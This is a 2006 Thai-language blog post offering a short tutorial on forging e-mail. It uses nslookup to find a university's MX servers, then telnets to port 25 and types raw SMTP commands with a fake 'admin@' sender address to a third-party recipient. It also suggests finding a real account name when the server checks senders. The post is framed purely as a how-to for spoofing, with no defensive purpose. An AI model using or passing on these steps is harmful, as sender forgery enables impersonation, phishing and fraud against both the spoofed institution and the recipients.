Thursday, November 16, 2006

การปลอม E-Mail

การปลอมเมลล์ใครว่าทำยากง่ายนิดเดียวเองอ่ะ เริ่มกันเลย
- เราต้องรู้ก่อนว่าเราจะให้โฮสใหนเป็นตัวส่งเมลล์ให้เรา (mail relay)
cmd> nslookp
cmd> set type=MX
cmd> hostname

เราก็จะได้รายชื่อโฮสเมลล์เซิร์ฟเวอร์

ตัวอย่างหาโฮสที่เป็นเมลล์เซิร์ฟเวอร์ของ somuni.ac.th

C:\Documents and Settings\user>nslookup
Default Server: ns.someuni.ac.th
Address: x.x.x.x

> set type=MX
> someuni.ac.th
Server: ns.someuni.ac.th
Address: x.x.x.x

someuni.ac.th MX preference = 10, mail exchanger = ohuh.somuni.ac.th
someuni.ac.th MX preference = 20, mail exchanger = ohuhmail.someuni.ac.th
someuni.ac.th nameserver = ns.someuni.ac.th
someuni.ac.th nameserver = ns1.someuni.ac.th
ohuh.somuni.ac.th internet address = x.x.x.x
ohuhmail.someuni.ac.th internet address = x.x.x.x
ns.someuni.ac.th internet address = x.x.x.x
ns1.someuni.ac.th internet address = x.x.x.x
>

ได้เครื่องที่จะเป็น เมลล์รีเลย์ให้เราแล้วครับ ohuh.somuni.ac.th หรือ ohuhmail.someuni.ac.th

- เมื่อเราได้เครื่องที่จะส่งเมลล์ให้เราแล้วเราก็เริ่มปลอมกันเลยครับ
telnet ohuhmail.someuni.ac.th 25
จากนั้นเครื่อง ohuhmail.someuni.ac.th จะต้อนรับเรา
ส่วนในการปลอม e-mail โดยการ ใช้คำสั่ง

HELO someone
MAIL FROM: admin@someuni.ac.th
RCPT TO: bilgate@msn.com
DATA

พิมพ์อะไรก็ได้ ถ้าต้องการหยุดให้ใช้ . (จุดฟูลสตอบ)
.
quit

- ชื่ออีเมลล์ที่จะเป็นต้ัวส่งนั้น บางครั้งเมลล์เซิร์ฟเวอร์อาจมีการตรวจสอบว่ามี account นี้จริงมั้ยถ้าไม่มีมันอาจปฏิเสธเราไม่ให้เราส่งก็เป็นได้ วิธีแก้เราก็ต้องหา account ที่มันมีอยู่จริงก็แล้วกันครับ
อันนี้วิธีใครวิธีมันนะครับในการหา account ที่มีอยู่จริงของเมลล์เซิร์ฟเวอร์เครื่องนั้นอ่ะคร้บ

No comments:

Post a Comment